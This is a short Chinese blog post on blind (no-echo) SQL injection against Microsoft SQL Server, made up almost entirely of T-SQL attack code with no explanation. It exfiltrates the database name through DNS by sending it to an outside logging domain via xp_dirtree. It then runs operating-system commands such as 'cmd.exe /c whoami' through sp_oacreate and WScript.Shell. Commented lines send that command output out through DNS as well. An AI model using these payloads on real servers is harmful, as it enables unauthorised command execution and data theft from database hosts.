mssql 无回显 注入

作者: print("") 分类: 信息安全 发布时间: 2019-06-13 14:44 

DECLARE @host varchar(128);
SELECT @host=(select db_name())+ '.hfkzaq.ceye.io';
select @host;
EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');

declare @luan int,@exec int,@text int,@str varchar(8000);
exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@luan output;
 
--exec sp_oamethod @luan,'run',null,'calc.exe';
 
exec sp_oamethod @luan,'exec',@exec output,'c:\windows\system32\cmd.exe /c whoami';
exec sp_oamethod @exec, 'StdOut', @text out;
exec sp_oamethod @text, 'readall', @str out
select @str+'1';

--DECLARE @host varchar(128);
--SELECT @host=@str+'.hfkzaq.ceye.io';
--DECLARE @ho2st varchar(128);
--select @ho2st=Replace(@host,' ','');
--SELECT @ho2st;

--EXEC('master..xp_dirtree "\\'+@host +'\foobar$"');

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

一条评论
添加新评论

  • life

    2019年7月16日 下午2:38

    回复TA

    lifelife

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

更多阅读
标签云
Apache2.4.50 Apache ShenYu APISIX APISIX Dashboard cc5 CNVD-2021-49104 CNVD-2022-60632 CobaltStrike CobaltStrike xss CommonsCollections5 Confluence CVE-2021-26084 CVE-2017-18349 CVE-2021-4034 CVE-2021-37580 CVE-2021-41277 CVE-2021-41773 cve-2021-42013 CVE-2021-43798 CVE-2021-44228 CVE-2021-45232 CVE-2021-45232 RCE CVE-2022-22954 CVE-2022-22965 CVE-2022-39197 CVE-2023-28432 Django E-Office grafana keytool store log4j2 MetaBase ONE Access python python爬虫 socks5 socks5搜索 store 证书转换成nginx VMware Workspace ONE Access ysoserial 代理池工具 宝塔面板 泛微 畅捷通 畅捷通漏洞 通达OA